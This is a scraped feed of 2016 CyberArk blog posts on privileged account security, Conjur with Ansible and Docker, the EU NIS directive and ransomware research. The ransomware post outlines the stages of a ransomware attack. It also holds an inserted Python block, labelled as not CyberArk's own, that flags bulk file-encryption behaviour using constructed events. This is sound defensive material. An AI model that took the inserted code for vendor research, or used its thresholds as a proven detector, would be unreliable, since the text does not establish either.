Multi-factor authentication is an important security control for critical systems. Evan Litwak will discuss how CyberArk integrates with common multi-factor vendors to add additional protection to the heart of the enterprise. This session will also cover ways to extend multi-factor authentication to legacy systems. You can register for this webcast here.

As you work to protect your organization’s most valuable assets, know that you’re not alone. We’re on the front lines offering security insights and solutions that can help you to mitigate risks.

]]>
A Phased Approach for Implementing Privileged Account Security Programs https://www.cyberark.com/blog/phased-approach-implementing-privileged-account-security-programs/ Fri, 26 Aug 2016 17:50:42 +0000 https://www.cyberark.com/blog//

Privileged accounts represent a significant attack vector that organizations have to address as part of a proactive cyber security program. With tens or hundreds of thousands of privileged accounts across a typical enterprise organization, IT security teams have to consider a number of factors as they improve privileged access controls – including complexity, legacy access and the unknown impact of change.

Though some CISOs set a goal from the start of deploying a comprehensive privileged account security program, many others take a phased, step-by-step approach based on an enterprise-wide, long-term strategy. To start, they often identify a small set of accounts using classification and risk-rating mechanisms to pinpoint the highest risk. These accounts are moved to a centralized and automated system. Then gradually, over time, the organization expands coverage to new phases.

The way an organization defines each “phase” will differ from company to company, but following are some examples of typical phases:

  • By platform/technology: Organizations can create phases for administrative accounts in Windows, Linux, mainframes, databases and so on. In some cases they address all of the machines on one platform first and then move on to the next; securing all Unix servers and then all Windows servers, for example, can help reduce the risk of intruders moving laterally between machines.
  • By region or by business unit: This approach is often used by global organizations in which each region has its own IT group and infrastructure. Similarly, if a company has separate IT groups for each business unit, it may choose to address each one as a phase.
  • By application team: If an organization has multiple application development teams, it may choose to work with each team in phases.

When determining which phased approach will work best for your organization, consider what would cause the least disruption while adding the most value. After you have success in one phase or area, you are in a position to scale up the program. Look for ways to standardize your approach across the organization. For instance, if a pilot project has applied a new approach to managing Unix accounts, use that process and strategy as a blueprint for managing accounts in other platforms.

As one CISO noted in the CyberArk-sponsored CISO View report, “Don’t bite off too much initially. Phase it in, manage the effort piece-by-piece in an incremental approach. Use a scoreboard to track your progress as things move into your privileged ID process so you can see month over month what it looks like as you continue to drive the advancement.”

In this short video, I share the three primary phases our customer success team often recommends for improving privileged account security using the CyberArk Privileged Account Security Solution. To learn more, please visit here.

]]>
Another Breach, Another Reminder: Cyber Hygiene Isn’t Optional https://www.cyberark.com/blog/another-breach-another-reminder-cyber-hygiene-isnt-optional/ Wed, 24 Aug 2016 15:23:11 +0000 https://www.cyberark.com/blog//

Last year Katherine Archuleta, director of the federal Office of Personnel Management, resigned in the wake of a breach exposing personal information of an estimated 20 million people, and in July 2016 Democratic National Committee Chairwoman Rep. Debbie Wasserman Schultz resigned following the leak of internal e-mails. In the private sector, cyber security failures have cost many executive leaders their jobs. They are not alone as noted in this CSO article that explores the fates of other executives post breach. A high-profile data breach can be a career-ending event for those in charge.

Organizations invest in cyber security technology, but too often they do not follow through with basic cyber security hygiene to address known or likely risks. More than a year after the OPM breach became public, a Government Accountability Office report concluded that the agency still needed to improve controls on critical information systems. The most recent Data Breach Investigations Report from Verizon found that the top 10 known vulnerabilities accounted for 85 percent of successful exploits studied. In the case of the DNC breach, numerous reports suggest that committee officials failed to heed advice from consultants to improve network security.

These breaches happen because leaders fail to prioritize cyber security and truly make it a part of organizational culture.

Pay attention to the basics

Very often it is small things left undone that facilitate breaches. Organizations invest in a variety of tools to help protect, monitor and analyze activity on networks. But you can’t forget to execute on the fundamentals. If you do, you leave a crack open for an attacker to enter.

Fundamentals include keeping security patches and software versions up-to-date, implementing and enforcing least-privilege access policies, using strong authentication as needed, and listening to auditors and consultants. Merely storing log data is not good security. Analyzing the data to identify and halt threats is better. If auditors identify security shortfalls, address them. Otherwise, your organization is exposed.

Institutionalizing security within your organization will add value to your investments in technology and the human resources. This is easier said than done, of course. Seemingly simple chores such as patching and updating software can be time-consuming and resource-intensive because of the need to thoroughly test changes. Effective policies require careful planning and broad buy-in from executives and others. Getting the resources needed to do the basics takes commitment at the highest levels of your organization.

Making the business case for cyber security

It is easy to appreciate the value of cyber security in the wake of an incident. It is much more valuable to make the business case for proactive cyber security. Here are a few points decision makers in your organization should keep in mind:

  • Your organization is a target. Your systems contain sensitive information about your plans and activities, and about your customers, employees and partners. You are part of an extensive business chain that includes suppliers and customers, and even one weakness in this complex system can be exploited.
  • Breaches have consequences. They are not merely an inconvenience. Victims incur direct expenses of detecting and responding to incidents and repairing damage, as well as the costs of downtime, damage to brand reputation and the threat to the jobs of those held accountable.
  • Cyber security is a full-time concern. Protecting your information resources is not a project, a one-time expense or a check-off for regulatory compliance. It is an ongoing program that requires the continuous attention not only of the IT and security staff, but also of decision-makers and C-level executives.

The stakes for cyber security are high and the competition is tough. A winning hand must include not only the right technology, but also a commitment to keeping your organization and its resources secure.

]]>
Passwords Don’t Have to Be the “Enemy of Security” https://www.cyberark.com/blog/passwords-dont-enemy-security/ Thu, 18 Aug 2016 17:58:04 +0000 https://www.cyberark.com/blog//

The headline of an Ars Technica article on password rotation recently caught my attention, “Frequent Password Changes are the Enemy of Security.” The article, which highlights a BSides Las Vegas keynote by FTC Chief Technologist Lorrie Cranor, explains that contrary to what we’ve been told for years, frequent password changes can be counterproductive.

Citing research from both University of North Carolina at Chapel Hill and Carleton University, Cranor noted that people who are compelled to change their passwords regularly – typically every 90 days – tend to simply update their old password in a very small way, like adding quotation marks or an exclamation point at the end. This practice, called “transformation,” results in passwords that are very easily cracked by attackers. In short, she argues that such password changes are a waste of the employees’ time and the changes do not make an organization more secure.

She’s right – frequent password changes executed by individual users are often exercises in futility for the reasons noted above, but that doesn’t mean that passwords shouldn’t be rotated. It means that organizations must get smarter about how the process is managed – this is particularly important when it comes to privileged accounts that provide access to sensitive data and critical systems. Without controls in place to proactively secure and manage these privileged accounts and credentials, organizations can face an increased risk of data breaches, insider threats, irreparable system damage, failed audits and fines.

Instead of leaving the management of privileged passwords with IT administrators, organizations should consider a privileged account security solution that can automate the process – discovering, securing, rotating and controlling access to privileged account passwords used to access systems across their enterprise IT environment.

Consider this example: a global financial services provider with nearly 60,000 employees worldwide wanted to remove the physical labor of managing highly privileged passwords manually while simultaneously improving its operational efficiency. It deployed the CyberArk Enterprise Password Vault. Not only did this eliminate a window of opportunity for passwords to be compromised, by accident or otherwise, but it also helped the bank meet stricter audit requirements. Furthermore, the company can now enforce an enterprise-wide policy, managing the entire lifecycle of shared and privileged accounts across the business. To learn more about CyberArk customer deployments, refer to the case studies available on our website.

Returning to the headline that caught my eye, let’s add four critical words to the end:  “Frequent Password Changes are the Enemy of Security Without Proper Password Management.”

]]>
What’s Your Privileged Account Attack Surface? https://www.cyberark.com/blog/whats-privileged-account-attack-surface/ Mon, 15 Aug 2016 19:25:35 +0000 https://www.cyberark.com/blog//

Discovery is the first step to establish effective privileged account security. In our experience and research, organizations typically have at least 3 to 4 times more privileged accounts than employees. This data point gives organizations an idea of what to expect in terms of scope of the project, but each environment is different and the actual numbers vary and can be significantly more.  To help organizations discover how many privileged accounts they have and where they exist, CyberArk offers a free Discovery & Audit tool. With this risk assessment tool, organizations gain visibility into privileged account vulnerabilities across the IT network.

CyberArk Discovery & Audit is a powerful risk assessment tool that discovers:

  • Passwords – Old and static passwords introduce significant risk of compromised credentials. CyberArk Discovery & Audit identifies all privileged account credentials including hard-coded credentials, for example, in IIS, Websphere, and Weblogic.
  • Password hashes – Passwords are frequently hashed and stored on local machines for user convenience by the operating system, but attacks such as Pass-the-Hash leverage these vulnerable password hashes in order to execute a credential theft attack, impersonate employees, and access valuable assets and data. CyberArk Discovery & Audit illustrates which machines store privileged passwords and how an attacker can execute a Pass-the-Hash and Golden Ticket attack.
  • SSH keys – Stored throughout a network, SSH keys pose a major challenge to security teams because these privileged credentials can be easily created without a record, and they are difficult to track, manage or control. CyberArk Discovery & Audit identifies SSH keys (including orphan SSH keys) and illustrates trust relationships that enable access to privileged accounts.
  • Unix security risks – Organizations frequently use sudo (superuser do) to enforce least privilege policies, yet many sudoers files contain unnoticed misconfigurations that let privileged users work around sudo and escalate their privileges. It's particularly critical to protect Unix environments because they often host an organization's most sensitive data. CyberArk Discovery & Audit discovers potential misconfigurations that could allow users to elevate privileges in Unix without authorization.

An organization’s privileged account attack surface is typically massive as it includes every piece of hardware and software in the enterprise including routers, firewalls, databases, servers, applications, endpoints, etc. With potential vulnerabilities hiding in every corner of the IT infrastructure, it’s vital to gain visibility of the attack surface. A good start is to find and identify privileged accounts across the organization – which is exactly what CyberArk Discovery and Audit is designed to do.

With knowledge of how many privileged accounts exist, and the status of each privileged credential, organizations can begin a privileged account security program by securing the highest risk accounts with a centralized solution. As organizations implement security controls, they can measure progress with metrics on privileged account security health. These milestones help to justify privileged account security programs by proving tangible ROI measures, which are also an effective way to engage with stakeholders.  We encourage you to learn more about this valuable tool.

 

 

 

]]>
Securing EC2 instances using Ansible and Conjur https://www.cyberark.com/blog/securing-ec2-instances-using-ansible-and-conjur/ Thu, 11 Aug 2016 19:09:00 +0000 https://cyberarkvx2.wpengine.com/blog/securing-ec2-instances-using-ansible-and-conjur/  

Ansible provides powerful orchestration capabilities to launch and manage machines in the cloud. Conjur provides advanced identity management and access control capabilities to help secure that infrastructure. This is the first in a series of articles in which we explore best practices for using them together, combining Ansible's legendary ease of use with the visibility and control provided by Conjur's declarative security, public key management, granular authorization and detailed audit logging.

In the modern IT environment, code and machines provision and access other code and machines, and therefore need the same privileged access that used to belong only to people. Conjur integrates with, and complements Ansible and Ansible Tower security to control and audit access between the thousands of interconnected microservices, machines, and people that compose your digital business infrastructure. It also distributes that control to your cloud edge, across data centers and remote/mobile infrastructure for fast, non-stop protection.

In this article, we show how to automate the process of:

  1. Launching a new EC2 instance on AWS
  2. Defining an identity and access policy for the new EC2 instance in Conjur
  3. Associating the identity and access policy with the new instance
  4. Configuring the instance for SSH access
  5. Auditing access to the instance

Launching instances

Launching an EC2 instance with Ansible and Conjur starts in exactly the way you’d expect. Our sample playbook, below and in Github, follows common patterns found in other Ansible EC2 examples:

[Image: the sample Ansible playbook for launching the EC2 instance (Ansible-Cookbook-EC2-Instance-Github.png)]

  • The playbook creates and manages its own security group called EE_Demos_Ansible. This operation is idempotent; the security group will be updated if it already exists, so it’s safe to run the playbook repeatedly.
  • The instance is tagged with a distinct EC2 tag indicating the application name. The Ansible ec2 action is instructed to launch exactly one instance with this tag, so the playbook is also idempotent with respect to the instance.
  • The add_host action is used to add the host to the Ansible in-memory “inventory” (the list of hosts and host groups that the playbook knows about).
  • The wait_for action is used to wait for the SSH port 22 to become available. Ansible needs this to do anything else, because it uses SSH to connect to machines and configure them.

Once the EC2 instance is up, we configure it for Conjur security. In this example, the instance runs a sample application called “frontend.” A declarative policy (below or in Github) which defines a Conjur “layer” for an application called “frontend” looks like this in YAML code:

[Image: the Conjur access policy for the “frontend” layer (Access-Policy-Secure-EC2-Instance-Conjur.png)]

The policy is loaded into Conjur like this:

$ conjur policy load --as-group ops frontend.yml

Then the policy can be inspected in the Conjur user interface:

Policy inventory:

[Image: policy inventory in the Conjur UI (Ansible-EC2-Creation-Access-Policy-Conjur.png)]

Policy role graph:

[Image: policy role graph in the Conjur UI (Ansible-EC2-Instance-Role-Graph-Conjur.png)]

Enrolling the new instance into Conjur

Once the instance is launched it needs to be enrolled, the process by which the instance obtains a unique Conjur identity and a set of roles (provided by membership in layers).

Conjur has a Host Factory facility for this purpose. Each Host Factory manages a set of cryptographic tokens (opaque, time-limited secrets). When the instance presents a valid token to the Host Factory it creates a new host identity which it communicates to the instance, and adds the host to the appropriate layers.

Ansible can provide Host Factory tokens to new instances as part of its workflow. Once Ansible has launched an instance, it obtains a Host Factory token from Conjur and passes it to the /opt/conjurize script on the instance, which in turn contacts the Host Factory on the Conjur server using the token.

Configuring the instance for SSH access

Once the instance has its identity, the “conjurize” script proceeds to configure the host for Conjur SSH access management (the installer for which is free software available on GitHub).

Conjur SSH provides SSH authentication via public keys and SSH authorization via PAM + Conjur LDAP, in addition to the following features:

  • Each user has their own private key.
  • This private key is used to SSH to EC2 instances using the standard SSH tool chain (ssh/putty client and openssh server).
  • Users are uniquely authenticated by private and public key, with the public key provided by the Conjur pubkeys service.
  • Users are then uniquely authorized to the host according to the Conjur role-based access control model, as defined by policies loaded into Conjur.
  • Users do not log in to the host as the “root” user or any other shared account (e.g. “ec2-user” or “ubuntu”). This is wonderful from an audit and compliance standpoint.
  • All login, logout, and sudo activity on the instance is recorded by the Conjur audit database, which is compatible with external auditing services such as Splunk.

 

Enrolling and rotating the host “break glass” SSH key

In the case that a machine becomes accidentally misconfigured, certain highly privileged personnel can be given a “break glass” SSH key to log in and regain control of the machine. This is a shared login, so Conjur makes this “last resort” credential secure by managing a unique SSH key for each machine which is rotated regularly and on-demand.

Once Ansible has finished launching the instance and conjurizing it, it runs a local play using Conjur to create and install the instance's unique “break glass” key. Conjur writes the public key to the authorized_keys file on the machine, and Ansible stores the private key in a Conjur variable accessible only to a defined set of authorized security personnel.

In order to maintain least privilege and prevent itself from becoming a backdoor, Ansible revokes its own access to the “break glass” key once it’s been created.

The Power of Ansible and Conjur together

The full power of Ansible automation can be combined with Conjur security and access management capabilities to create deployment environments which are both highly automated, and highly advanced from a privileged access management standpoint.

Building Privileged Account Security into the Cloud https://www.cyberark.com/blog/building-privileged-account-security-cloud/ Mon, 08 Aug 2016 15:51:44 +0000 https://www.cyberark.com/blog//

In our regular conversations with customers and others, many tell us their organization is on a “journey to the cloud.” Inevitably, the discussion turns towards privileged accounts in cloud environments and how to secure them.  We have solid advice and answers for them – the CyberArk Privileged Account Security solution secures privileged accounts in applications, servers and management consoles in cloud environments in much the same way it works to secure privileged accounts located on-premises. Our solution is designed to support privileged accounts regardless of where they reside.  However, in cloud environments, there is more.

In order to maximize the benefits and flexibility of the cloud (and speed the process of migrating workloads to the cloud), many organizations engage the help of cloud orchestration and automation tools such as Chef and Puppet. These tools deliver efficiency when migrating to and managing cloud environments, allowing organizations to quickly move and deploy new instances and applications. It is this automation in cloud environments that provides an opportunity to employ “advanced” privileged account security methods and policies.

What do we mean by “advanced”?

Used with these tools, CyberArk can automate the process of securing privileged accounts in addition to securing the orchestration tools themselves.  Here are some use cases that demonstrate the use of Puppet:

  1. Automate the deployment of a new MySQL Server in AWS and seamlessly provision the newly created admin account directly to the CyberArk Digital Vault at the time of creation. We refer to this as Privileged Account Security “built into” the cloud environment.
  2. Secure the privileged accounts required by Puppet (ex. AWS console credential) in the CyberArk Digital Vault and enable Puppet to securely retrieve these credentials on-demand.
  3. Automatically provision the agent required for secure application-to-application authentication to a new server at the same time it is created – for use when applications are developed on the server.

These use cases not only improve efficiency and conserve resources, they also demonstrate improved security because the securing of privileged accounts occurs at the time of inception, rather than after a delay due to the timing of a scanning or discovery process. It’s this integration of Privileged Account Security with automation that delivers security aligned with the flexibility and convenience of the cloud.

Learn more about protecting privileged accounts in cloud environments here.

New Network and Information Security Directive Aims to Mitigate Risks of a Cyber Attack on Critical Infrastructure https://www.cyberark.com/blog/new-network-information-security-directive-aims-mitigate-risks-cyber-attack-critical-infrastructure/ Thu, 04 Aug 2016 14:35:36 +0000 https://www.cyberark.com/blog//

As security incidents increase in frequency and impact, the European Union (EU) Council has approved the Network and Information Security (NIS) directive. This mandate is designed to help member states mitigate the risks of a cyber security incident, and it represents the first legislative framework to cover the interconnected European critical infrastructure.

The NIS directive was adopted on May 17, 2016 and it will require operators of essential services and digital service providers in critical sectors such as energy, banking, water and health to develop programs to mitigate cyber security risks. It also imposes new requirements for collaboration amongst member states and establishes new guidelines for the reporting of major security breaches within each of their critical infrastructure sectors. The new directive goes into effect in August of 2016, but member states will have 21 months to design their national programs and six additional months to identify the affected operators of these essential services.

As we’ve seen from recent incidents such as the Ukraine power grid attack that left 225,000 customers in the dark, privileged accounts are at the center of cyber attacks and their compromise can pose a great risk to critical infrastructure. The damage from a cyber-attack is no longer contained to the digital world, as attacks can have grave consequences in the physical realm. The security of privileged accounts represents a top priority for critical infrastructure organizations in order to mitigate these risks.

It is recommended that a cyber security framework for national critical infrastructure includes a comprehensive privileged account security program as a significant step towards mitigating the risks associated with advanced persistent threats. Some recommendations to consider around privileged account security for critical infrastructure include:

  1. Understand the privileged account problem and proactively secure privileged credentials, including user and application passwords and SSH keys
  2. Keep privileged credentials from people with malicious intent and keylogging malware by establishing a secure way to connect to critical assets without revealing passwords
  3. Establish a central point of control for accessing critical systems through the isolation of privileged sessions
  4. Monitor privileged sessions and establish workflows to terminate a session if malicious activity is suspected
  5. Leverage analytics tools that can help detect anomalous activity and alert security teams of in-progress attacks
  6. Don’t neglect security at the endpoint; gain control of application permissions on endpoints and servers to reduce the damage caused by malware

Read more about practical steps to secure critical infrastructure here.

The move by the EU to establish a cyber security framework around critical infrastructure reflects the increasing risk of attack and the devastating impact that an attack could have on European infrastructure. Today, industrial enterprises increasingly view privileged account security as a strategic priority that must be included in a national cyber security strategy and deployed horizontally across critical infrastructure sectors.

New CyberArk Labs Research: Analyzing Ransomware and Potential Mitigation Strategies https://www.cyberark.com/blog/new-cyberark-labs-research-analyzing-ransomware-potential-mitigation-strategies/ Tue, 02 Aug 2016 12:55:50 +0000 https://www.cyberark.com/blog//

Reports of ransomware attacks continue to escalate, as we’ve explored in recent posts. The FBI reported that cyber criminals used ransomware to extort $209 million from enterprise organizations in the first three months of 2016 alone. This form of malware – designed to infect machines, encrypt as many files as possible and hold the decryption key for ransom until the victim submits the required payment – has skyrocketed in popularity in recent months for two key reasons:

  1. Many organizations fail to practice good hygiene when it comes to backup and recovery.
  2. Many organizations still rely on traditional anti-virus solutions, which are often not effective in blocking ransomware.

As part of an ongoing investigation, our CyberArk Labs team has tested more than 23,000 pieces of real-world ransomware to learn more about how it works and to identify alternative methods for mitigating the threat. As a result, they have identified a common prevention denominator across all ransomware instances tested to date. This revelation, along with actionable recommendations for combating ransomware attacks, can be found in the just-published report: “Analyzing Ransomware and Potential Mitigation Strategies.”

Five high-level findings detailed in the report:

  1. Ransomware is Evolving by the Hour: Unlike traditional malware, which is frequently reused across a wide range of targets, ransomware strains are typically mutated for each new victim. Traditional anti-virus solutions that rely on blacklists are typically ineffective in preventing ransomware because they simply can’t keep up with the thousands of new samples produced each day. To effectively protect against ransomware risks, organizations can’t just protect against known malware; they also need to protect against unknown malicious applications.
  2. A Common Path to Encryption: The team observed what actions were executed by different ransomware samples, and learned that samples across different families all followed a similar sequence of steps. Typically, the malware first attempted to communicate back to an attacker-managed key server, which held the unique public key used to encrypt files on the machine. Second, the ransomware began to scan the infected machines to locate specific file types. Third, upon locating the files, the ransomware began the encryption process, while working to maximize the number of impacted machines.
  3. Ransom Payment Method of Choice: To receive the key needed to decrypt the impacted files, users were required to submit payment – the ransom – to the attackers. Payment was typically demanded in Bitcoin, and for Bitcoin novices, some attackers went so far as to set up “help desks” to help victims purchase Bitcoin and complete the funds transfer.
  4. Ransomware Seeks Admin Rights: In 70 percent of tested cases, ransomware attempted to gain local administrator rights once activated. But interestingly, only 10 percent of the tested files failed if these rights could not be attained. This shows that even though the removal of local administrator rights from standard users is a best practice and certainly could have prevented some of the ransomware, this measure must be layered with application control to reliably protect against file encryption.
  5. A Common Denominator: Testing by CyberArk Labs demonstrated that a highly effective way to mitigate the risk of ransomware attacks is to prevent unknown applications, including unknown ransomware, from gaining the read, write and edit permissions needed to encrypt files. When tested by CyberArk Labs, a combined approach of removing local admin rights and application control, including greylisting, which restricts read, write and modify permissions from unknown applications, was 100 percent effective in preventing ransomware from encrypting files.
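The “common path” above gives defenders a behavioural signal that does not depend on any sample’s hash: a single process touching many files, across many directories, within seconds, and usually changing their extensions on the way. The following is an added Python example, not CyberArk Labs code, showing how that heuristic can be run over file-activity events of the kind an endpoint agent or audit subsystem records; the event tuple format, the thresholds and the sample events are constructed for this illustration.

```python
"""Flag processes whose file activity looks like bulk encryption.

Added example for illustration: the event format, thresholds and sample
events are assumptions, constructed here rather than captured from malware.
"""
import os
from collections import defaultdict, deque

# Event fields: (timestamp_s, pid, process_name, operation, path, new_path)
# new_path is "" unless operation == "rename".


def constructed_events():
    """Build a constructed activity log: one slow backup job and one process
    that rewrites many documents across directories within a few seconds."""
    events = []
    for i in range(8):
        events.append((100.0 + i * 10, 401, "backup", "write", f"/backup/set1/file{i}.bak", ""))
    dirs = ["/home/dana/Documents", "/home/dana/Desktop", "/srv/share/finance", "/srv/share/hr"]
    for i in range(24):
        d = dirs[i % len(dirs)]
        events.append((200.0 + i * 0.1, 777, "unknown.exe", "rename",
                       f"{d}/report{i}.docx", f"{d}/report{i}.docx.locked"))
    return events


def detect_bulk_modification(events, window=5.0, min_files=20, min_dirs=3):
    """Return {pid: summary} for every process that modified at least min_files
    distinct files spread over at least min_dirs directories within any
    window-second span. Extension changes on rename are reported as context."""
    by_pid = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_pid[ev[1]].append(ev)

    alerts = {}
    for pid, evs in by_pid.items():
        recent = deque()           # (ts, path, ext_changed) still inside the window
        counts = defaultdict(int)  # path -> occurrences inside the window
        ext_changes = 0
        for ts, _, name, op, path, new_path in evs:
            if op not in ("write", "create", "rename"):
                continue
            target = new_path if op == "rename" else path
            changed = op == "rename" and os.path.splitext(path)[1] != os.path.splitext(new_path)[1]
            recent.append((ts, target, changed))
            counts[target] += 1
            ext_changes += changed
            # Slide the window: forget events older than `window` seconds.
            while recent and ts - recent[0][0] > window:
                _, old_path, old_changed = recent.popleft()
                counts[old_path] -= 1
                if counts[old_path] == 0:
                    del counts[old_path]
                ext_changes -= old_changed
            dirs = {os.path.dirname(p) for p in counts}
            if len(counts) >= min_files and len(dirs) >= min_dirs:
                alerts[pid] = {"process": name, "files": len(counts), "dirs": len(dirs),
                               "ext_changes": ext_changes, "at": ts}
                break  # one alert per process is enough
    return alerts


if __name__ == "__main__":
    for pid, info in detect_bulk_modification(constructed_events()).items():
        print(pid, info)
```

On its own a count-based rule like this also fires for legitimate bulk jobs (backups, indexers, mass renames), so in practice it is combined with whether the process is an unknown application and whether an outbound connection preceded the burst, which is exactly the application-control angle the report argues for.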

The full research report explores a number of techniques used to mitigate the risk of ransomware, outlining the pros and cons of each. Based on this extensive research, the Labs team also presents an alternative, proactive approach to application control that, when combined with least privilege controls, can enable organizations to better protect themselves from both known and unknown threats. To learn more, download the free research report here.

Docker 1.12 – Another Piece In The Container Security Puzzle https://www.cyberark.com/blog/docker-1-12-another-piece-in-the-container-security-puzzle/ Mon, 01 Aug 2016 19:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/docker-1-12-another-piece-in-the-container-security-puzzle/  

Docker has taken a welcome step toward making security easier for containerized applications. In Docker 1.12, made generally available last Friday, Docker has been enhanced with “mutually authenticated transport layer security (TLS), providing authentication, authorization and encryption to the communications of every node participating in the swarm, out of the box.” It also automatically rotates PKI certificates for containers. All of this is enabled automatically on startup of the swarm, for secure-by-default orchestration.

The Docker 1.12 security improvements address what has been a tradeoff between deployment simplicity and risk, especially as deployments grow in complexity and scale. However, even as Docker 1.12 secures communications within and across nodes, the question of what those nodes can do once they connect – and who within the organization can define what they can do – still needs to be resolved. These questions apply to containers, their hosts, the Docker registry, applications and services accessing the nodes, and the people responsible for managing the Docker 1.12 infrastructure.

  • What permissions do containers have to access shared host resources and secrets?
  • How are policies defined for client authorization to the Docker Registry?
  • Can token use be logged and audited?
  • Who or what gets to make changes to the Docker Engine or daemon, and how are they authenticated?
  • Who gets permission to make access policy changes, and how are changes tracked?
  • How are permissions defined to make changes to Docker processes (master, worker) based on organizational role – such as developer, QA or production?
  • How are changes and activity logged for containerized applications and management?

These security, compliance, and governance questions are not restricted to Docker – they apply from one end of the software delivery pipeline to the other, from software repos, through build, release, orchestration, and configuration management. Therefore, the container security introduced in Docker 1.12 should be seen as a piece in a larger, role-based access management solution that secures the entire software delivery pipeline consistently.

Conjur Fit for Purpose: Container Authorization

Conjur’s role based access control, secrets management and authorization policy abstraction layer fills in many of the pieces of the puzzle needed for more secure Docker orchestration across environments.

Secrets & SSH management for the entire software delivery pipeline

Conjur manages secrets (including certificates, API keys, passwords and SSH keys) in a centralized service that is easily integrated with the Docker 1.12 environment. Conjur defines, enforces, and audits compliance with authentication and authorization policies for:

  • The containers themselves,
  • Human identities managing and building applications on the Docker infrastructure,
  • and Docker machine identities (notably the Docker daemon).

The secrets management service releases secrets to the Docker controller based on authorization events, and ensures that they are regularly rotated and that access is strictly controlled and logged. For organizations that use SSH to control developer, administrator and application access, Conjur manages and audits the SSH access to the cluster nodes. Conjur also provides the authentication and authorization service for the Docker Registry, with all activity logged on the basis of issued tokens.

Least-privileged access to Docker & associated infrastructure

Conjur’s policy framework enables role-based permissions for developers and administrators that should have least privilege access to Docker and the cloud services that support container deployments. Centralized management of clearly defined policies and role-based access controls translates into consistent patterns as well as visibility into all changes made across the containerization tier.

More fundamentally, Conjur allows customers to ensure that authorization is a separate step from authentication, during which the login system determines if the authenticated user or container should be granted login access based on their access key, and what their access level should be. Here, Docker’s new authentication features can be leveraged for greater automation.

As containers are started and ‘Conjurized’ they have the ability to individually filter inbound traffic based on policy rules, ensuring no rogue services spin themselves up, and outbound traffic is contained. With all communication between containers appropriately tagged based on issued tokens, Conjur delivers complete audit records for all static and ephemeral services.

Protection for hybrid application infrastructure

Most customers are still going to want to retain some flexibility on what platforms and environments their containerized applications run on – including hybrid cloud architectures. Docker has put containers on the map, but for larger enterprises the reality is that multiple container platforms and methodologies will co-exist or operate in parallel. This means that for security and consistency, authentication, access management and authorization should be abstracted from the underlying platform.

Ransomware is on the Rise https://www.cyberark.com/blog/ransomware-is-on-the-rise/ Tue, 26 Jul 2016 14:39:18 +0000 https://www.cyberark.com/blog//

Research shows that most advanced attacks today start with phishing or spam emails sent to non-privileged business users. These phishing attacks often utilize ransomware – a form of sophisticated malware that blocks access to sensitive files by encrypting them and demands payment in order for the user to access the files again. According to recent research highlighted in a CSO article, 93 percent of all phishing emails contained encryption ransomware as of March 2016.

Ransomware is on the rise, and attackers increasingly use this approach to target enterprise organizations. Ransomware can be particularly challenging to combat, as once inside the network, it can compromise machines, steal data, capture credentials or damage systems all without using any administrative privileges. If an organization has removed users’ administrative rights on endpoints and servers but is not monitoring and controlling which applications are allowed to run on these machines, a rogue application containing ransomware, which does not require administrative privileges to run, can enter the infrastructure and execute in the environment. This gives attackers a foothold into the organization.

In the short video below, Jessica Stanford, CyberArk’s Senior Product Marketing Manager, shares best practices for mitigating the risk of ransomware, from employing defense-in-depth and regularly backing up files to applying a combination of least privilege and application control.

In another article, Jessica noted research the CyberArk Labs team conducted to test how CyberArk Viewfinity protects against known and unknown variants of ransomware. The team manually tested 450 specific ransomware samples from 14 different crypto families (including Cryptolocker, Petya, and Locky) – focusing on the most common and notorious ransomware strains. CyberArk Viewfinity was able to block 100% of the ransomware samples from successfully encrypting files.

As attackers become more adept in circumventing defenses, organizations are increasingly vulnerable to ransomware and other types of sophisticated malware. To learn more about how to strike the right balance between security and usability to effectively reduce the attack surface while keeping users productive, please visit www.CyberArk.com/Viewfinity.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

CyberArk Impact 2016: Implementing Privileged Account Security https://www.cyberark.com/blog/cyberark-impact-2016-implementing-privileged-account-security/ Fri, 15 Jul 2016 16:59:40 +0000 https://www.cyberark.com/blog//

Last week, we spent three action-packed days with our European customers and partners in Barcelona, kicking off the CyberArk Impact 2016 Summit series. Next week, a team from CyberArk will convene in Boston with our Americas customers and partners. These events represent the largest gathering of privileged account security experts globally and provide an opportunity for attendees to discuss the ever-changing cyber security landscape, share stories and learn best practices for bolstering privileged account security. Through interactive sessions and training, attendees learn the most effective ways to protect critical enterprise assets.

Here are six takeaways from last week’s discussions:

  • Privileged Account Security is an organizational priority: The rise in awareness about advanced threats has prompted many organizations to shore up privileged access controls in order to mitigate risks. In fact, it has become a top organizational priority for a growing number of companies in recent years.
  • Enterprise-wide initiatives are challenging: Taking the time to fully develop a strategy and business case is critical in order to overcome any obstacles.
  • Knowledge-sharing is critical: Cyber attacks have reached a level of sophistication that allows attackers to potentially evade existing security controls and access privileged credentials. Peer-to-peer guidance is invaluable in the fight against cyber attacks.
  • Stakeholder engagement is key: Typical of any comprehensive project, it’s important to secure buy-in for what you and your team aim to achieve. Engage with stakeholders on a regular basis. In the words of one of our speakers, ‘it’s useful to have a big guy with a hammer’ too.
  • Demonstrate value through milestones: Think about how privileged account security integrates within a wider environment; chances are, it’s not feasible to get the whole infrastructure under control immediately, but it is important to show value quickly. Set early goals in conjunction with business partners, define phases to minimize business disruption and capitalize on initial successes by creating blueprints for repeatable processes.
  • Establish metrics that matter: It is crucial to define the reduction in risk the project will achieve. Senior management, the board of directors and other key stakeholders used to simply ask for assurances that things were okay – but not anymore. Now, they need risk reduction and breach scenarios to be explained. Establish metrics that they can understand, and use the metrics to steer course corrections, measure control efficiency, and assess the impact of controls on system availability and application performance.

Achieving the right balance between enabling and restricting high levels of access to information assets is difficult, but necessary. By convening to share insights and collaborating with one another regularly, best practices emerge to address the ever-changing security landscape. Next week’s event marks our 10th Annual Summit for the Americas. We look forward to the ongoing dialogue.

Privileged Account Security: a Strategic Program Not a ‘Project’ https://www.cyberark.com/blog/privileged-account-security-strategic-program-not-project/ Thu, 14 Jul 2016 20:43:37 +0000 https://www.cyberark.com/blog//

Today, enterprise IT security teams increasingly recognize that compliance does not equal security. Taking a compliance or project approach is not enough to secure a business. Although important, compliance is table stakes in the world of advanced, persistent threats. The sophistication of attackers continues to increase, and they now operate inside of networks – stealing credentials and escalating privileges to reach a goal.

